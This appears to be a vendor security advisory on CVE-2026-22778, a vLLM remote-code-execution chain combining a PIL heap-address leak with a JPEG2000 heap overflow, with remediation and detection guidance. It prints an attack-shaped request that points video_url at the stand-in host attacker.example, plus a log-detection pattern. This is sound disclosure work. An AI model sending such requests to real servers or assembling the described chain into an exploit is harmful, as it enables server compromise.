Introduction

A critical vulnerability (CVE-2026-22778, CVSS 9.8) was disclosed on February 2, 2026, affecting vLLM, a widely deployed Python library for serving large language models. The flaw allows unauthenticated attackers to achieve remote code execution by sending a specially crafted video URL to the API. No active exploitation has been publicly confirmed yet, but a detailed technical writeup is available. Organizations running vLLM with multimodal video model support should patch to version 0.14.1 immediately.

Quick Overview

CVE: CVE-2026-22778
Severity: Critical (CVSS 9.8)
CWE: CWE-122 (Heap-based Buffer Overflow), CWE-532 (Information Exposure Through Log Files)
Affected Products: vLLM
Affected Versions: >= 0.8.3, < 0.14.1
Attack Vector: Network
Authentication Required: None
Exploit Complexity: Low
User Interaction: None
Active Exploitation: No confirmed reports
PoC Available: Yes (technical details public)
CISA KEV: No
Fix Available: Yes (version 0.14.1+)

What is vLLM?

vLLM is a high-throughput, memory-efficient inference engine for serving large language models in production environments. It has become a widely adopted solution for organizations deploying LLMs at scale, offering significant performance improvements over alternatives for concurrent workloads. This is why a vulnerability in vLLM carries substantial risk: compromising a vLLM server can provide attackers access to sensitive model data, user prompts, and potentially the broader infrastructure, as these deployments often run on high-value GPU clusters.

Technical Analysis

This vulnerability is a chained exploit combining two distinct weaknesses that together enable reliable remote code execution.

Stage 1: Information Leak for ASLR Bypass

The first vulnerability exists in how vLLM handles errors from the Python Imaging Library (PIL). When an invalid image is submitted to a multimodal endpoint, PIL raises an exception whose message includes the memory address of a BytesIO object. In vulnerable versions, vLLM returns this error message directly to the client, exposing a heap address. According to the advisory, the leaked address sits at a predictable offset of roughly 10.33 GB from libc in memory, shrinking the effective Address Space Layout Randomization (ASLR) search space from approximately 4 billion possibilities down to around 8 guesses. This transforms what would otherwise be a probabilistic exploitation attempt into a reliable one.
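
As a rough illustration of the leak mechanism (this shows standalone PIL behavior, not vLLM's actual code path), the error PIL raises for an unreadable image embeds the repr of the BytesIO object, and that repr contains a heap pointer:

    import io
    from PIL import Image, UnidentifiedImageError

    try:
        # Any byte stream PIL cannot parse as an image triggers the error
        Image.open(io.BytesIO(b"definitely not an image"))
    except UnidentifiedImageError as exc:
        # The message looks like:
        # "cannot identify image file <_io.BytesIO object at 0x7f3a2c41e590>"
        # Vulnerable vLLM versions returned a message of this shape to the client.
        print(exc)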

Stage 2: Heap Overflow in JPEG2000 Decoder

The second vulnerability resides in the JPEG2000 decoder bundled with OpenCV’s FFmpeg dependency. vLLM uses OpenCV to process video content, and when decoding JPEG2000-encoded video frames, the decoder honors a “cdef” (channel definition) box that allows remapping of color channels. An attacker can craft a malicious video where the Y (luma) channel data is directed into the U (chroma) buffer. Since the Y buffer is significantly larger than the U buffer (due to chroma subsampling), this causes a heap overflow. For example, in a 150×64 pixel frame, the Y plane contains 9,600 bytes while the U buffer only holds 2,400 bytes, resulting in a 7,200-byte overflow into adjacent heap memory.
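
The overflow size follows directly from 4:2:0 chroma subsampling arithmetic; a quick sanity check of the figures above:

    # Worked example for a 150x64 frame with 4:2:0 chroma subsampling
    width, height = 150, 64

    y_plane = width * height                 # 9,600 bytes of luma data
    u_plane = (width // 2) * (height // 2)   # 2,400-byte chroma buffer

    overflow = y_plane - u_plane             # 7,200 bytes written past the U buffer
    print(y_plane, u_plane, overflow)        # 9600 2400 7200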

Attack Flow

  1. An initial probe request containing an invalid image leaks a heap address via the PIL error message, defeating ASLR
  2. The attacker sends a request to /v1/chat/completions or /v1/invocations with a video_url parameter pointing to an attacker-controlled server (a request sketch follows this list)
  3. vLLM fetches the video content from that server
  4. The downloaded video contains crafted JPEG2000 frames built using the leaked address
  5. OpenCV’s JPEG2000 decoder processes the video, triggering the heap overflow
  6. The overflow overwrites a function pointer (such as AVBuffer’s free pointer) with the address of system()
  7. When the buffer is freed, arbitrary commands execute on the server
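
The sketch below shows the rough shape of the request in step 2, assuming the OpenAI-compatible multimodal message format; the model name, URLs, and port are placeholders rather than values from the advisory:

    # Hypothetical request shape; useful mainly for recognizing the pattern in traffic and logs
    import requests

    payload = {
        "model": "example-video-model",  # placeholder model name
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this video"},
                {"type": "video_url",
                 "video_url": {"url": "http://attacker.example/payload.mp4"}},
            ],
        }],
    }

    # Externally sourced video_url values like this one are the indicator to watch for
    resp = requests.post("http://vllm-host:8000/v1/chat/completions", json=payload)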

Affected Versions

Branch: vLLM
Vulnerable Versions: >= 0.8.3, < 0.14.1
Fixed Version: 0.14.1+
Notes: Update immediately

Important: Deployments that do not serve video or multimodal models are not affected by this vulnerability. The exploit requires the video processing code path to be reachable.
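
A quick way to check whether an environment falls in the affected range (a sketch; it assumes the vllm package is installed in the environment being queried and that the packaging library is available):

    # Compare the installed vLLM version against the advisory's affected range
    from importlib.metadata import version
    from packaging.version import Version

    installed = Version(version("vllm"))
    affected = Version("0.8.3") <= installed < Version("0.14.1")
    print(f"vLLM {installed}: {'update to 0.14.1+' if affected else 'outside the affected range'}")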

Threat Status

Exploitation Activity: No confirmed in-the-wild exploitation has been reported as of the disclosure date. However, given the detailed technical writeup available and the critical nature of the vulnerability, exploitation attempts are likely to emerge quickly.

PoC Availability: Technical details sufficient to reproduce the vulnerability have been published in the GitHub Security Advisory. This includes the structure of the malicious cdef box, overflow calculations, and the attack chain methodology.

Attribution: No threat actor attribution has been published.

Why This Matters

This vulnerability is particularly concerning for several reasons.

First, vLLM deployments are high-value targets. Organizations using vLLM are typically running sophisticated AI infrastructure with access to proprietary models, training data, and sensitive user interactions. A compromised vLLM server provides attackers with access to all of this data.

Second, the default configuration amplifies risk. Out-of-the-box vLLM installations do not require authentication, meaning any attacker with network access to the API can attempt exploitation. While API keys can be configured, the vulnerability can be triggered through the invocations route before authentication is validated.

Third, the blast radius extends beyond a single server. vLLM is commonly deployed in clustered environments with GPU resources. Compromising one node can provide a foothold for lateral movement across the broader infrastructure, potentially affecting multiple systems and workloads.

Finally, exploitation is reliable. The information leak component transforms this from a probabilistic attack into a deterministic one, making successful exploitation much more likely once an attacker identifies a vulnerable target.

Remediation

Primary Action

Upgrade vLLM to version 0.14.1 or later immediately. This version includes patches for both the information leak and the underlying heap overflow.

Version-Specific Instructions

pip installation: pip install --upgrade "vllm>=0.14.1"
Docker: Update to vllm/vllm-openai:v0.14.1 or later
Source builds: Pull latest from main branch and rebuild

Interim Mitigations

If immediate patching is not possible, consider these temporary measures:

  • Disable video model endpoints: If your deployment does not require video processing, disable multimodal video support entirely
  • Restrict network access: Ensure vLLM APIs are not exposed to untrusted networks. Place them behind authentication proxies or VPNs
  • Enable API authentication: Configure API key authentication to add a barrier to exploitation, though note this does not fully mitigate the vulnerability
  • Monitor for suspicious requests: Watch for requests containing external video_url parameters, particularly from untrusted sources

Post-Compromise Considerations

If you suspect a vLLM instance may have been compromised:

  • Isolate the affected system from the network immediately
  • Preserve logs and memory dumps for forensic analysis
  • Review all connected systems for signs of lateral movement
  • Rotate any credentials or API keys that may have been accessible from the compromised host
  • Audit user prompts and model interactions for potential data exfiltration

Detection Guidance

Network-level indicators

  • POST requests to /v1/chat/completions or /v1/invocations containing video_url parameters with external URLs
  • Sequential requests from the same source: first an invalid image probe, then a video request
  • Outbound connections from vLLM servers to unexpected external hosts

Host-level indicators

  • Error logs containing PIL exceptions with memory addresses (pattern: BytesIO object at 0x; a log-scanning sketch follows this list)
  • Unexpected child processes spawned by the vLLM worker process
  • OpenCV or FFmpeg decoding errors followed by process crashes or unusual behavior
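
A minimal log-scanning sketch for the leak pattern above (the log file path and exact message wording are assumptions; adapt the pattern to your logging pipeline):

    # Flag log lines that echo a BytesIO heap address back in an error message
    import re
    import sys

    LEAK = re.compile(r"BytesIO object at 0x[0-9a-fA-F]+")

    log_path = sys.argv[1] if len(sys.argv) > 1 else "vllm.log"  # assumed default file name
    with open(log_path) as fh:
        for lineno, line in enumerate(fh, 1):
            if LEAK.search(line):
                print(f"possible address leak at line {lineno}: {line.strip()}")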

How Can Orca Help?

The Orca Cloud Security Platform helps customers identify cloud assets running affected vLLM versions and understand real exposure context, including internet accessibility, attack path reachability, and asset criticality. By correlating vulnerability data with runtime configuration and infrastructure context, Orca enables teams to prioritize patching and investigation based on true exploitability and blast radius. Orca’s News Item view highlights affected assets directly, helping security teams focus on the most critical systems first.